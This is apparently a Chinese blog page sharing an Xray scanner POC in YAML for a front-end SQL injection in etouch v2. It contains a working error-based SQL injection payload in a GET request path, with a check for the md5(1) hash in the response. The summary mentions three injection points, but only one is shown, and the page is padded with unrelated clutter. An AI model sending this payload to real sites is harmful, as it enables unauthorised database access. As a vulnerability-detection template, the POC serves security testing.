xray完美插件poc-yaml-etouch-v2-sqli

这篇博客介绍了如何利用Xray进行POC测试,特别是针对etouch v2的前台SQL注入漏洞。文章详细展示了三个不同的注入点(sqli1, sqli2, sqli3)的GET请求路径和预期响应,说明了如何通过布尔盲注进行利用。" 96145648,5593534,Golang使用Redigo实现Redis发布订阅,"['Golang', 'Redis', 'NoSQL数据库', '缓存']

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

原始yml:name: poc-yaml-etouch-v2-sqli

name: poc-yaml-etouch-v2-sqli
rules:
  - method: GET
    path: >-
      /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'
    expression: |
      response.status == 200 && response.body.bcontains(b"c4ca4238a0b923820dcc509a6f75849b")
detail:
  author: MaxSecurity(https://github.com/MaxSecurity)
  links:
    - https://github.com/mstxq17/CodeCheck/




这个要做前台无限制sql注入:

前台FLOW cart_label_count $goods_id 半限制SQL注入

public function cart
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值